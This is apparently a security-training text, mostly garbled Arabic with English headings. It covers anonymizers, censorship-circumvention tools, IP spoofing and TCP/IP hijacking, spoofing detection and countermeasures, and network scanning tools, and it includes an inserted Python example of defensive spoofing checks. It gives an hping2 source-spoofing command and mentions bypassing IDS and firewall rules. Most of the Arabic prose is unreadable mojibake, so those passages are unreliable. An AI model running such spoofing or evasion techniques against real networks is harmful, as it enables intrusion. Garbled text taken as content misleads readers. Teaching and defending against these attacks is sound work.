(web navigation) s^ji^ Jx^ JjjL jo ciLjA ; [Ensures privacyl^Ha^aJI 
t^jjlalj* ^ ^Jix^ : (Access government-restricted content)S^iAJ) cjLjI^) J) J>^ajJI 

_4_jojljud^ djLd ^ist-« jl 4_jjaj\_Ld ^ic- CjLg ^ix-d <Jj (J ^ll t ; u^J lI^^ tJ -0 U^*^ iS J*^ ^ j -0 (Jj (J £y* 

.^^U3I ^ jLk ^ Anonymizer c> ^ Jj^\ c> g-tj^Vl fiiA Jj Jj^jll pg'^^j u^ 1 ^^ 
c> ^ c> f jIj Anonymizer : (Protect you from online attacks)^">jVI cjIa^a &a diaU* 

l_j <j^aLk]| DSN ^ J^ ^j^V^ J^ JJ^>^^ <-J^ (Jj J 3 ^jj^VI Jc CjIa^JI 

.Anonymizer 
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aJL*A\ jl JjUj : (Bypass IDS and firewall rules) IDSj ^jUaJI J±± ^IjS Jj* uit&Wt - 

.t&Jl <J jj^ jll (jlajjflj V ^31 £Sl ^<J1 cJ L_L>Ua3l jl (J^ila J-<JI ci^ el) - * (J^jl-^l J> diUJaixJl J 1 g a 

jljj^ Jl JL^jVI ^jJ-^ ' J^l ^ c> .Anonymizer 

aJI Jj^ijII ^jjj qf\ J jijj Jl tdL-ajjj Anonymizer f j% ^ .^j^VI J^ Anonymizer 

.csj^l gilj* ji jijj Jl ^ jSlj t Anonymizer J^ J] 
* A ^ i A a a i^i> ul Ij^jI a j£ t^Ld^jjaixJI ^jjtg-I <1jL<^. Jaill L_fljj^j t Anonymizer^ j3-il J^ 

Types of Anonymizers f Ij^i 

CjUUJI jjq-^ <J!>tk ^ LojLojI cJ-**^ .^—^j^^ 4 m ^ djUi^. ^I^jjujI Aic ^jj^a s.li^.1 ^j-<Jl Ig-^A. Anonymizer 

(Networked anonymizers) ^ A 1 < ' ^ ^Jf^ - 
(Single-point anonymizers) S^lj ^ilj 

(Networked anonymizers) ^iLS ^ 

IgJLojjj dijjliV! jj jjj^ll l>« J^lk (j-<i ciL <j^aLk]) diL* jIslxJI Jib V jl (Anonymizers) ^^'^ ^ I^a 

.anonymizers u^?j ^ JU^jI L> ^hl ci? 

s J^U. ^ Vjl ^j^j li^ .requests 1 ^ 3 t . i^ja 

.till A 6 B ' CJ^^ L>^ C5J^^ A^kx^al] Jii ^Iluj t^aij^all ^jj Asu .^3 L_jUi3l (JjS C 6 B 6 A^J^V^ JJJ^^ 

.IjIsla jjj-aII Ja^j bua CjVtufljVi J bSault :Sjj-a]| 

(Single-point anonymizers)S^lj <JaAj ^iau ^ 
.(arms-length communication) ^LduSfl Jjla cjVU-^VI JjS ^> kLal\ cjli cjUj^aJIj IP (jljjp iSj^aJI 

Case: Bloggers Write Text Backwards to Bypass Web Filters in China 

u jj^ > j oh tijlS j ^ j^Vl cjU^i JjU^ ^ j 'Tiananmen 'Democracy 'Tibet lS^ 

<jU^3 J-^l C-H^l ^— J l J^l I j^AaJLujI (JJJ^ > -^1 j ^jjjj jA^Jl ,ClijjljVI a£jjoi A-ii^llI ^dl^>J ^)^^ (jg& o^ 3 ^ '^ JJfi* 

^ V^J U^^^j jLuult ^1 (j^Jl t>» jl C-ilkll Jl (j-aill 
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Psiphon :^J\ <> 5bi 
https://psiphon.ca 

VPN <j^aLaJI 4_jjJaljjaVI A£jjoJI ClAjjjj ~1 I^LujI _Ia jjc.j <- j ua ^ j jfrT.uill 4_ij^3lII <£LuJ|j (jljjjj LjjSj gall JlLd 

^ jiiuj b j jja jl 3-ASj jj^ (j* ajUj!^ j dijjjjyi J j^JI (j* a\\ HTTP Proxy Jj^j^ jj^j SSH Sjj^I Jj^jj jjjj 

<J^j (j* cilli j Cljjljyi (^C- cJ J^^l ^ '^-^ J cJ Jallj 4jI ^^^ic L_fl^xj3l (j^ C5"^"^ lS^^J ^ (J^aLkJl (jjibLai £C^li^)J (J^aC- 

.Caj jSjVI ^ ajI^ stats J 

Your-Freedom <> vj^t Stai 

https://www.your-freedom.net :j^*5l

^■tl^j ^ (jjiJI (j* ^ (j^al^JI a£jjoJ! (jl jic C5^^ W^'j <iuu31j (j£-a-a <J jll (j£-<uJI jjc. <J*-?^ your-freedom 
J a SOCKS proxy ^^-ajU ^jJaLk jjc. J a ^^joS jjj ;<jlajl3 <»_jJaLk jjc. jj jjj^ll J StaVI .<ja^x-<i 

j] Lft£ U»U»J CljjijVLj ^L^lxi ^^ic (Jj^^j (jl (j^J t&jl (^5^- 'c^^ *^ ^ tajj 6<iL <j^aLaJI Cjlknialll <Jjfi (jxi 4^I^JjujI (j^-dJ ^^1 

. JjS JL^jI jl jjLJI jj6 DSL f v^nn ^ 



[Screenshot: Your Freedom client window showing connection status, the selected server and traffic statistics (send rate and receive rate in bytes/sec)]





(jU dVUl^l i^IUa jli ctilxi JL^il pliil connection time-out j^^ lP 3 ^ "<0^ u^" ^) 

sj cA-iii> ^ll CijjljVI a£jjoi ^^Ic (j^^jjaixJI JjS (j>i L^jII J jll (jS-<^ xyz.com ^ ^ j-^^ taj La Ai^>x-<J .D^la^. ^ j>JI 



. WebsitePulsej just ping 



j! j^I ^1 



JjujI 
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Just ping 

http://cloudmonitor.ca.com/en/ping.php 
Ping ^ j& .f^-*-^ p-IajI ^-i^ 3 qVi^ a ^al Ping <J**j ^ ^joij ^jJI j dujiiVl <-ajta obi Just ping 



[Screenshot: APM Cloud Monitor Ping tool (Tools: Check Website, Ping, DNS Analysis, Traceroute): "Ping a server or web site using our network of over 30 monitoring stations worldwide" (IPv6 now supported). Results for Ping to: www.facebook.com:]

Checkpoint                         Result                    min. rtt  avg. rtt  max. rtt  IP
Orlando, U.S.A. (usorl01)          Packets lost (100%)       -         -         -         2a03:2880:2110:9f07:face:b00c::1
Stockholm, Sweden (sesto01)        Okay                      117.5     117.7     118.0     2a03:2880:2130:cf05:face:b00c::1
Santa Clara, U.S.A. (usscz01)      Unknown result from ping  -         -         -         2a03:2880:2110:3f07:face:b00c::1
London, United Kingdom (gblon01)   Okay                      104.0     104.4     105.3     2a03:2880:2110:9f07:face:b00c::1
Madrid, Spain (esmad01)            Unknown result from ping  -         -         -         2a03:2880:2050:3f07:face:b00c::1
Padova, Italy (itpda01)            Okay                      122.0     122.3     122.6     2a03:2880:2130:cf05:face:b00c::1
Singapore, Singapore (sgsin01)     Unknown result from ping  -         -         -         2a03:2880:20:3f07:face:b00c::1
Cologne, Germany (decgn01)         Okay                      101.4     102.0     104.9     2a03:2880:2110:3f07:face:b00c::1



WebsitePulse - 

http://www.websitepulse.com
.fJUl! cUjI j^iij .axj ^ 1^ jll CjU^k ^SL WebsitePulse 



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G-ZAPPER 

http://www.dummysoftware.com : j^-a-JI
^ajL Ujliti .CiijljVI cii^JI ^UjI <J j^-^o s-iyi ^^ic til^cLoajj 4 jj£ j£ ^joixJ 4 jj£ j£ stal G-Zapper 

^bj^ ; jjjk-S] ^j^j jjSjU -4 s .ME/NT/2000/XP/VistaAVindows7/98/95 Jj^j f ^ > 

.lsj^VI Google £A-^j <Adsense 'Gmail &\J±* j&j t^jajii 

t^lc JaxjJalU j£j tCllliiall 4)\aC* (Ja s-l^ljVl ^«Jj '""/"^ 4)\a* } ^aLiJl Wizard ^W*^ <J^-^ OJ- ( (* "1 

[Screenshot: G-Zapper (trial version) window. "What is G-Zapper": "G-Zapper - Protecting your Search Privacy. Did you know - Google stores a unique identifier in a cookie on your PC, which allows them to track the keywords you search for. G-Zapper will automatically detect and clean this cookie in your web browser. Just run G-Zapper, minimize the window, and enjoy your enhanced search privacy." Status: "A Google Tracking ID exists on your PC", Your Google ID, the date Google installed the cookie (September 05, 2012), "Your searches have been tracked for 13 hours", "No Google searches found in Internet Explorer or Firefox". "How to Use It": "To delete the Google cookie click the Delete Cookie button. Your identity will be obscured from previous searches and G-Zapper regularly cleans future cookies. To restore the Google search cookie click the Restore Cookie button." Buttons: Delete Cookie, Restore Cookie, Test Google, Settings, Register]



aIL* j j£ cJ^j^ djUL t_fli^ tSUi .Delete Cookie ^» > ^L j ^ j£ J^j-^ cjUL cJi^J -2 

<JLoj j jj^ij j^j^ cjUL ^3!^ c*Ui .Block Cookie ^ ^ > j^j^ cjUL ^^liJ -3 

.Yes -SaiujJU ^jiia cilli ^£U3 

.Test Google ^ ^» > ^ j^j^ J^j^ ci^ ^ ^ <Ja j^Vj -4 

.View log f3 Setting (ij^ t*Ui l^iia. ^ ^1 J^j^ -5 

ANONYMIZER 

till ^jjj I^jV i( j^aLk]| cillal uii j t^j^j jl L_iisu ^jj^ ^il j-<JI ^ (j^l^JI IP (jl j^c cill ^joij sbl c _^a Anonyiiiizer 

5J j^aij <^H<i ^ ^1 Anonymizer ^^ j .^^^ djU^lcVI ^ dujjjVI jjh^ a\\ (j a\\ J jj^a jit 

Mowser available at http://www.mowser.com

Anonymous Web Surfing Tool available at http://www.anonymous-surfing.com
Hide Your IP Address available at http://www.hideyouripaddress.net
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Anonymizer Universal available at http://www.anonymizer.com
Guardster available at http://www.guardster.com
Spotflux available at http://www.spotflux.com
U-Surf available at http://ultimate-anonymity.com
Hope Proxy available at http://www.hopeproxy.com

:TCP/IP HIJACKING ATTACK))TCP/IP J* j^JI f J** 

AjauJaH jjj JL^ajl 4^A± ^^Ic ^^biaj^U (spoofed packets) v^ l ^ yA\ ^Vnnj l_j jLJ y> TCP/IP ji^Jl ? 
j(spoofing)^ >jV1 Jj^jjjjj £ha> ^^£5 ^JlJ J£Ju :ul*j ^ . (host machine)^^Jl j 

aAxJ 4ju[£ ^l^kJl CjU^A .^llulVl ^\ 3JLoJJ JjuIJJ JjoJ^JI J-g^ ^ 

c^jIS di^ j^VI <^ jjixJI -Unix) Jj* 

.(IP spoofing -DNS spoofing -ARP spoofing) yr* 

Spoofing IP address -1 

jli toiA ^l^kli ^1 ^ . jkuoll ^j^a Jla CjU^JI ^j^j ^l^kJI CjU^a ^jj ^ Spoofing IP addresses 

q\A O j^. ^a jjiC. <jl jJC <jL^2j| Aic , <J^21a]| q\ J^xl\ ^\ cJ^j] ^ J -fO^ 6 ^ L_llla ^^Sc ^jIj ^>^.V1 L_fl^Jl L_flJjJaxJl 

4l$* ^l^ijl JaxJI jl^JI t-flajjj/^jlxj ^ (non-existent system) '^y^j^ (*^-^^ ^ Jh < ^ > ^i^ l 

IP spoofing using Hping2: 



# hping2 www.certifiedhacker.com -a 7.7.7.7



a A±j£l\ uL*±a ^1 ls Ljou TCP / IP f > Jtuu jj ^Luuj jp ^1^1 LiH dlLoj Hping2 ^t^o^W 







(Direct TTL Probes)»^M TTL cjlLSaJ ;IP spoofing cP ua^l cjUSi 

,<J j£ (jjoii (j-<i Ul£ lil TTL uj-^ < — * ^^^^ ^j^iilt ^jj A>*^Jt TTL ^ ^ 15-^-^ j^ll ^TTL 

cjVU^j! .buUi VhViJ jjSj aJ jVl TTL ^ t> ^ ^Vim^t J j£ jjjjJt J! bUl^l < allkj J jVl TTL ^ 4t*Ui ^ j 
ja jjll jl£ lit 255j 128 ^ TTL ^ ICMP JAwjJj 128j 64 ^ ^ j^Vl aJjVITTL ^ <TCP/UDP 

A_*j3 (j^^ 3 hop V w * clA^ . a Laalalt CP" L * a '* < ^ <^*^\ llOp <J (jj^jlt ciLlc ( . 1^J3 flll^a <J j£ 

^ ^Jll A»>Jt ^ ^ jJI TTL ^ ^J 1 TTL cJ6 ^\ .J jVl TTL <-*S <> ^Jt ^ s^jJI TTL 

AjU-13 <J$juJ! UJ-^ ^ a ^AjJa^iH j jAj^xall q±i (HOP) jmII ^— fl^>*J g a\\ <jl£ tit ^KTu Ugi tit tig-La (jS^jJt 




[Figure: Direct TTL probe. The attacker (spoofed address 10.0.0.5) sends a packet to the target with spoofed source 10.0.0.5 and TTL 13; the real host 10.0.0.5, which the target probes directly, is also shown.]

AjJjuj (JjSj jliikVt ti& ^jIjj (jli t^JL^Jt aifc L>^ UJ*'^ <S ^



(IP Identification Number) IP <^jj*^t ^bjj :IP spoofing 6^ j-^jj cA^Sa 

oj>A JLojjI ^»JJ D^a ^3 ^JJJ (_$i3l IP <_>Jj ^fl (ID IP) tsfij*^' f^jll bl Yiml ^J^>J (j^aj 

(JLaijU j»2 j»l Ajijjii^ <Lo_^aJI b) La Ij^Jkj] .<JC jail A^AuJI (JjiSJ ( _ 5 Jc <ja ■ iallj A^Uj (j^ <J^ (jj-^J LaAic. yji 5Jls<i <aj^)la]l 

"Laja. db-qj] tl^ia jjiajll ^»JJ A^aj^A\ £y> * ajflll ll±jl£ b! .-^1 ^ IP ID elcl^a j i_a^Jl (jjiajll "Laja. 
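The two probes described above (the direct TTL probe and the IP identification probe) implemented as defender-side checks over constructed packet records. This is an added example, not code from the original text; the `Observed` records, the initial-TTL table and every address, TTL and IP ID value in it are assumptions made for the demonstration:

```python
"""Spoofed-source heuristics: direct TTL probe and IP identification probe.

Added example written for this page; it is not code from the original
text. The suspect packet, the probe replies and the initial-TTL table
are constructed for the demonstration. In practice the suspect packet
comes from a capture and the reply from a probe sent to the claimed
source address (assumption: that host answers the probe).
"""
from dataclasses import dataclass

# Initial TTL values commonly used by operating systems (64 for Linux
# and BSD, 128 for Windows, 255 for many network devices). The hop
# count is estimated as the distance to the next such value.
INITIAL_TTLS = (64, 128, 255)


@dataclass(frozen=True)
class Observed:
    """One packet as seen by the defender: claimed source, IP TTL, IP ID."""
    src: str
    ttl: int
    ip_id: int


def hop_count(ttl: int) -> int:
    """Estimate hops travelled: smallest common initial TTL >= ttl, minus ttl."""
    if not 0 <= ttl <= 255:
        raise ValueError(f"TTL {ttl} is outside 0..255")
    for initial in INITIAL_TTLS:
        if ttl <= initial:
            return initial - ttl
    raise AssertionError("unreachable: 255 covers every valid TTL")


def ttl_probe_mismatch(suspect: Observed, reply: Observed, tolerance: int = 0) -> bool:
    """Direct TTL probe.

    Probe the claimed source directly and compare the hop count implied by
    its reply with the hop count implied by the suspect packet. A packet
    that really came from that host should have travelled the same path,
    so a different hop count points to a forged source. `tolerance`
    absorbs a small route change between the two observations.
    """
    if suspect.src != reply.src:
        raise ValueError("probe reply must come from the claimed source")
    return abs(hop_count(suspect.ttl) - hop_count(reply.ttl)) > tolerance


def ip_id_probe_mismatch(suspect: Observed, reply: Observed, window: int = 50) -> bool:
    """IP identification probe.

    Hosts that fill the IP ID field from one global counter produce IDs
    that are close together for packets sent within a short time. If the
    reply's ID is not within `window` of the suspect packet's ID, the two
    packets were produced by different hosts. The 16-bit counter wraps,
    so the forward distance is computed modulo 65536.
    """
    if suspect.src != reply.src:
        raise ValueError("probe reply must come from the claimed source")
    return (reply.ip_id - suspect.ip_id) % 65536 > window


def assess(suspect: Observed, reply: Observed) -> dict:
    """Run both probes and report which of them flag the packet."""
    ttl_flag = ttl_probe_mismatch(suspect, reply)
    id_flag = ip_id_probe_mismatch(suspect, reply)
    return {"ttl_mismatch": ttl_flag, "ip_id_mismatch": id_flag,
            "likely_spoofed": ttl_flag or id_flag}


# Constructed sample 1: a forged packet claims 10.0.0.5 but was sent by a
# Linux host 13 hops away (64 - 13 = 51); the real 10.0.0.5 is a Windows
# host 3 hops away that answers the probe with TTL 125 and IP ID 40000.
SPOOFED = Observed("10.0.0.5", ttl=51, ip_id=2586)
SPOOFED_REPLY = Observed("10.0.0.5", ttl=125, ip_id=40000)

# Constructed sample 2: a genuine packet from that host, probed a moment
# later: same hop count, IP ID only a few packets further on.
GENUINE = Observed("10.0.0.5", ttl=125, ip_id=2586)
GENUINE_REPLY = Observed("10.0.0.5", ttl=125, ip_id=2590)

if __name__ == "__main__":
    print("forged :", assess(SPOOFED, SPOOFED_REPLY))
    print("genuine:", assess(GENUINE, GENUINE_REPLY))
```

Both checks are heuristics with known blind spots: asymmetric routing can shift the hop count by one or two (hence the tolerance), and systems that randomise the IP ID or keep a separate counter per destination (most current operating systems) make the IP ID probe meaningless, so a negative result from it proves nothing. In a monitoring deployment the verdicts are logged as indicators for an analyst rather than acted on automatically.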




[Figure: IP identification probe. The attacker (spoofed address 10.0.0.5) sends a packet with spoofed IP 10.0.0.5 and IP ID 2586 to the target; the real host 10.0.0.5 is also shown.]



(TCP Flow Control Method)TCP jiJS ^311 J> ;IP spoofing 6& uiJaM 

~ JslI A-Ld jjt j^Jt .l^J A > <al \\ Aj-g jjt j^Jt (Jj^a (jc (Jj^LuiaH j Jjuj^Jt £yz J£ ^^ic ^a^ilt ^Vilt ^jjjua^J \ $ j£ TCP 

(windows siz(?) ^isUll iji^ (^^ic l^j ^£^j3t (j^j IP ^_>^ c3^^ .^3^^ SiaUll qJu^\ ^a^iilt ^£^j3U 

CjULJt ^ (jlxui j^a j^tj C5 itLJt JjS L^jIc JjA^Jt ^t djUUJt ^ j^a jj£t JIaj JSaJ! tiA . TCPu^' J 
^jj UAio .djUUJt (jflis ^ ^aalt U^Loij JSaJ! tiA jli t^UlUj .(Acknowledgement) jlj^V' uj^ u' <iuj><Jt 
.djUUJt ^ ^3^^ J^j] J^>^^ j' s- 1 ^ t jL^alt ^t (windows size)J^*i\ u^*^ 
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. (initial windows s/ze) JjVl J-^VI iilU jl j cjLUJ! JLo> jj ^ ^jjj ji < jitill J ^Sa^It 

4_i^jJa3! Jj]j jij _< ; i^jJa3l CjUUJI cJ^jj J j.<u.>.>Lj jUaVI a ^jc CjLg jl*-* Jc- ACK ^3^- <-W^ (J? '^ $ ^ 

J^;^ ( o,*<Uj ^Ja^ill J ^£^j3I <L Ja 4_Jlxi3 m A L^jIq 4^*3^" cW-*^ U' ( ; lij taiaUll a ^ jLi. CAjLJl ^3^" 

JjuAjujj ^Sj JjI^jIU o^Axlxi ^ j^j pLb L_i»_j^a3l ^ <j| La£ t (handshake)** ^ ^ > ^> a\\ *uL&c J^lk <JjL^j3L a-s&W ^ cj^j 

JLL. SYN c> J^^u^ li] ^ -ACK JL- jj SYN-ACK JjV» SYN > 

Jjuj^JI q\ j*j t*lli jli tCjUUj J\ ACK J^jj J^>«JI I^J . j**-^ SYN-ACK s-^ ^L? c> j' 
^jjjJ (j^lj ACK ^3^ J^j-^ Jc- ( ; t ji^all Jj SYN-ACK u^*^ ^ ^ , ^ c * 1^ jJIslxJI 

ACK 



[Figure: TCP flow control method. Attacker (Spoofed Address 10.0.0.5) sends a SYN packet with spoofed 10.0.0.5 IP to Target; the real host 10.0.0.5 is shown alongside.]

:(IP Spoofing Countermeasures) IP spoofing J2 cjULaaJI 

IgjUJJ ill J^C. AjflLjaj ^alg_x» pbl 4_ilc ( . L^J t(Pen test) c3l3^^^ j;*^ a ^jJii Uiajl L^j^stxJl J^kVI j£lg-lt 4_L^aja3l J 

IP Spoofing J^i L£ .J^aJI iL^aljill ^ ^Jjl oaJ ^J^l JJjI^all iLkjL dlx^ lij Vj lg-S <ajS V 4£jj^3I J AjlftVl djl^iiill 

ll^iifki ^ji^j Jll IP ^l^kJ SjLjaJt J^l^ill 4> ^ J <^Lk]i A<iU*\\ (jJ dibl^V IP Spoofing a^Lu^o J^I^J 

Avoid trust relationships ^1 £i&Ul\ -\ 

^jj ^3^1 ^>^^ l5^^ L>^ (*3^^ lij ,til3 AlmkJl ^3^" J^jjj (Jj^ c fl-ijJa^ ^joiijl jLaajl UJ^>^ (S A ^ ^Aa^LujJ 

^.1 ^j-d J^ ^^liil ^3^^ (jmVim^l ^j-d 6 jLilLj ,<jL^VI cJj^aaJ ^3 tl^J ^jjJ j-g ciL ^aLiJl L_flJjJaxJl JjS ^j-<i IgJL o jj 

Use firewalls and filtering mechanisms £^J^ £)\j**l\ ^(^1^1 -2 

<Ldjta3l AjJ±aJi ^3^^ *^J^ ^3^ UJ^ ^ ^ m^ti CliLi Jx-<JI (jl^ j CjLa^JI ( . oj^L^ll j jll ^3^^ ^J^> Ajjj^aJ ( . la>J 

Jl AjJfaJl ^3^^ <J J^"^ CS-^ C5^J^ ^ cAjLcl^JI jl^a. *^J^ jll ^3^^ ^Lii^aJ djLill ^ ^ jj ^1 ^Viml V du£ lij 
J ,<J ^ jj^aII pistil J jj^ jll ^1<J (ACLs) <J j3 ^1 I^LujI <Lj SjLuA t . ujujj (j| (j£^jj tiL <j^aLaJl (JL^jVI 

^ .cdljudfll L<J ciL ^aLkJ! (JLgcV! (jc <jujL CjLq jl*-* I jlwJJJ ^ ^jj^^l g ^11 .lJ^I^I L>^ UJ^^^ <S ^j'^^j Ljajl c^IUa ;<jaiij dlS jll 

J ^.l^xJI '^ c ' ^3^^ ojjin^ Ljajl cilLiA ,LLjak3l Ia jjc. jl (jl^a Jj Lj^jI 11a 

https://www.facebook.com/tibea2004 ^uJa ^^aa^a 
^^J| ^a^il (Jj^ «a*J ^j) < . la>J Ji3 /aj^L^ll (»3^ <j!)tk (j-a t U' U^** . J^*^} eUa&l (jj^ ^ig-xJl Jl 

.o^jl jll ^»3^ U °^ ^ S J^ 1 ** Dj^L^all 

Use random initial sequence numbers ^t^^t J mlnnU ^SjVt ?&Ji\ ^ l^ll^l -3 

i> <j jiiill ISNs J*^ ^ .(timed counters) < r^UJl ££j\\ J &h\i*l\ qAJ\ Jl& ISN 
JL^iVI J i jj^ll ISN c> TCP Jl^^U ISN .ISN jh j*** ^ lW 

li* t . ua^l ,c*L <j^aUJ> 4£jJ^I JjJ* 5jSI J f^LaJl J) ^in^ jL^ajl *lj^l (j£*J <li <ISN Jf^ -gr^^ 

Ingress filtering JiUl A-iL^j -4 

n J l jj>JI j^. (3^j(router) j^l * j^l j Jjo^j Jll j(router) j^l * j$^> ^ J j^l 

(jUaill ^J^> Jl (jl Jalimj <J-GJU ^31 (ACLs) (J J^-} ^jI jfj ^I^JjojI j jl^cl .6^J^C (J^>iaJ lA^jjjJ 

Egress filtering ^jj^l -5 
Use encryption j^iiJ) ^iJilyil -6 

jixkll (jia^xJJ (jl (j^J (^l ^I^VI Jjils<-!l QlA^l^ll ^ .IP Spoofing CjUl^J (J^ JjJafll liA j-<» j <C jj ^l 

^U^al ^ ^l^xJI ^Ijl lil udj 

a i^JLujI ,4£jjaJ! ^L^iaV c5^>^^ C-iLijij laJLujI cJj^-^ ^ jl j& * >1 J (jia^suj (jl (j^j ^>^.l c _ 5 ic jj^ix-SI Jj^-^ ^ $ ^ u!^ 

(SYN flooding countermeasures) SYN^^^J SjU^I -7 
.IP spoofing ^ ^ ; uaj til^cLojj (jl Uiajl (j^j SYN flooding ^ s^Lja^ j^lull 

[IP spoofing ^-j^^A t ; C _^L La Aiijj .qj tAjjojLojVI o^LjaxJI j^l^ill L-uLa. ^1 

jl^A ^^Jc ^l^cVI djLd jls^ ^1 J jj^a jll ^AaJ 
ping >^^jVI J^axJ 

TCP / IP^UIL J TTL Jj^ 0^ - 

_CllLafIa3l SJ^jLLq 4_jU^J| ^jlj^a. a I iklLujI 

ARP spoofing -2 
SCANNING PEN TESTING 3.8 



. jblkVI <JUi jlfi^V l^lul M^' ^ jU^tt j J) jlkVI Jfi^ ^-a^i 4j^UJ| 

SCANNING PEN TESTING Jb^VI 

jjL<J| ialixJI L_flLau£l tA-i^JI ^Jaill -^-^j lS^^ 3 CP" lS^^VI a£jjoJ (j-aV! ^-^aj ^3^^ c^c- ^I^Ijujj Jjl jlkVI j;*^ o Cy* o^^^l 
jUlkl jl (j-^^i t .a£jJo3I (jljlkl jl^*3 '^}*j ^ grabbing system banners j ^aii^Jl dl^ai! j 

(<J ^ VgT JJJ 1 u ifl^a ^3 (jSj ^3 lit) *La>iaJLuid (jp^-j 

.banners u ^J * ^ jt 

a JJ^I J jJ3 ^jia^a] ^Uaill 4_jU^JI jl^ Sjjlsua 



'Nmap 'Angry IP Scanner aIjj^JI (j-aai CjI j^I ^l^klujU t*Ui j tAi^loiJI 4£fxi3l ^ ^ ^<JI j jqj^^ l ^1 t (s? ^JI 

_4_jU^J1 c Lff ^l\ c Luiaxll ^jc c Lu^ll L-ixj^ali ^ _^c3j ^NetScan 

.^j 'Net tools 'PRTG Network monitor 'NetScan tool pro <Nmap ^1 ^l^i^U £Aj jjJl/iaUJl ^-a^i ijiii 

(OS Finger printing) J^iUt ^UaS j! Banner Grabbing :3 Sj^l 
liA j ^Netcat 'ID Serve 'NetCraft < TelnetcS^ ^Ij^i ^l^i^U OS Finger printing jl Banner Grabbing ^1^ 

'SAINT 'GFI LanGuard 'Nessus <^i3! < aajjall Jalij L >^^i djljj ^1 ikl^L < aajjall Jalij ^I^jV a£^SI o-^^i <iLc; 
u^JI Jalij ^ jjkJ! ^ ^L^j Cj! jjVi ^ .^]] 4 OpenVAS'MBSA 'Ratina CS 'Core Impact Professional 
cjU jll t Friendly Pinger <LANState 'OpManager 'LAN surveyor ^->1 j^Vl <> ^ ^jjj ^j^j 

:6 S^laaJt 4- 

£l] <ProxyFinder <Gproxy <+Proxy 'SSL Proxy 'SocksChain < ProxifierJ^ ^l^i^U ^.^jjJI 



Monitoring TCP/IP Connections Using the CurrPorts Tool 

http://www.nirsoft.net/utils/cports.html 
o'±& . C5 1^a1I Jig a li jjLJI UDP TCP *l ia^l o- 3 ^ ^^j^ CurrPorts 

jl ciujjj cjUIac ^1 < . liLajj Vj liiiill (JjIS Jiiui^ (Jjflaj CurrPorts ^bVl . J^«-^^ ^*l^ ^ Netcat ^3j:^ ,; ^ J^Uj sl^VI 

.(Dynamic Link Library) DLLs 

aJL5A\ j^ki lJj^j o jj^j cports.exe c3j^ W-j^ ' CurrPorts l!^-^ -1 

-L> AiJ ^Uaj ^ netstat 

[Screenshot: CurrPorts main window after launching cports.exe.]

L^ia <!^joii<JI 4^j\i3l VIEW j^-^j ij jis^l CjI j^Vl -iajj^ c> ^ clA^ HTML ^ j^j^ 6 ^ ^jj^ -3 

HTML Reports All Items 
jtikj 4jj1sl!I *L<ijlfl3l ^ djl -lajjj^i CjLg jl*.* ^jjii ^iLill (^Ic ^ u^*^ j^*-* ~4 

.Properties U-^ ^jlill File 

0- JL-aSi jlil cillij Close Selected TCP Connections(Ctrl+T) 1^1 ^3 ^ ^ ^ -5 

.^^J! ialdl) ^ TCP £ JH 

iiiJI ^ 4_iLc J\ jl*] fcdii j Kill Process Of Selected Ports ^4 ^ ^ <> -6 



[Screenshot: CurrPorts main window (menu bar: File, Edit, View, Options, Help) with the File menu open: IPNetInfo (Ctrl+I), Close Selected TCP Connections (Ctrl+T), Kill Processes Of Selected Ports, Save Selected Items (Ctrl+S), Properties (Alt+Enter), Process Properties (Ctrl+P), Log Changes, Open Log File, Clear Log File, Exit. Table columns: Local Port, Local Address, Remote Port, Remote Address, Remote Host Name, State, Process Path. Visible rows: firefox.exe connections between 127.0.0.1 ports (14288-14292) to host JANA-TEBA in state Established, one firefox.exe connection to remote port 443 (Established), firefox.exe and 192.168.50.1 entries in state Listening, and System (PID 4756) listening on TCP 554 (rtsp) bound to 0.0.0.0.]
,\_L<uil ^jja j& Lo£ Exit ^ ~7 



Auditing Scanning by using Global Network Inventory 

http://www.magnetosoft.com/product/global_network_inventory/features 
l3#^ o-^^ l^i^a jj t^l^ikU (ji^j j&\ s j^VI ^ ^Uaj j j jj j& Global Network Inventory 

<Jb^ '(auditing scanning) <i^^ ^-^US c^ikiJ U lil .zero deploymentj agent-free J^j i> 

J j J: u x ^3l Zj^aS kx+\jA <j^Global Network Inventory .o^ 1 ^ J 1 ^ j^j^^^ * iU£l\ Jj>*JI 

m ^l\ t^jjtj j3I j£l j^j 4a£jJo3I cjlauliaj i switches ^ ^ & tS-iixJ! 

.Global Network Inventory host 4 — aixJi ^ & jj jjj^l l Sj^i ^^jj^ j^ll t^jjjUxJI djlalkj J^Lk ^ oj^VI (j^^^j 

firewall ^1^1 j^^j ^Vl oaailt/jjS^ll c> de facto i> Global Network Inventory 

.Idle Scanning o^aaill aA^c J^UIojI Ljajl ^H^JI j 

^Jalia 4ic d^slxJI jiJl J^-^. ^txilj^Jl (JjxjoUJ ^ jlj ^aJ Ciiiull (j^aLkl! Wizard (* "1 

i^Vl^ oaailt (j-a^VI Wizard <^?J^ c5 





[Screenshot: Welcome to the New Audit Wizard. "This wizard will guide you through the process of a new inventory audit. To continue, click Next."]

I^VIS IP cl^j^ ^ASlkj J^U. ^ ^j^i^qllj * jlJ IP range j 4_^LSJI j^ia next -2 



[Screenshot: New Audit Wizard - Audit Scan Mode]

To start a new audit scan you must choose the scenario that best fits how you will be using this scan.

- Single address scan: Choose this mode if you want to audit a single computer.
- IP range scan (selected): Choose this mode if you want to audit a group of computers within a single IP range.
- Domain scan: Choose this mode if you want to audit computers that are part of the same domain(s).
- Host file scan: Choose this mode to audit computers specified in the host file. The most common scenario is to audit a group of computers without auditing an IP range or a domain.
- Export audit agent: Choose this mode if you want to audit computers using a domain login script. An audit agent will be exported to a shared directory. It can later be used in the domain login script.

To continue, click Next. [< Back | Next > | Cancel]

*£f£U IP ojjUJI 3^ ls^'j X&J&\ J! ^^jja Next <ij* Jti\j IP range scan J£*>\ 



[Screenshot: IP Range Scan - Specify an IP Range to Audit. IP range From / To fields filled with addresses in the 10.0.0.x range. "To continue, click Next." [< Back | Next > | Cancel]]



jUkj l^ia j (authentication) (i^^W<jy^^ o- 3 ^ ^ j Next <ij£ jfclt -4 

^ jjj (djU^^L^all ^-i^ <A\ a) L_jLud^. (Jj^j (jl t i> j) 4-^ mi^j <j^aLk!l ^jj^ajll ^—^-^ (J^-Aj ^li Connect as 

Next c> J^h 
[Screenshot: Authentication Settings - Specify the authentication settings to use to connect to a remote computer. Options: "Connect as currently logged on user" or "Connect as" (selected) with Domain\User and Password fields. "To continue, click Next." [< Back | Next >]]



.Finish ^* * f* j^j ^ jjsVI cjbl^VI tiljlia Next ^ 4^Ui3l kj -5 



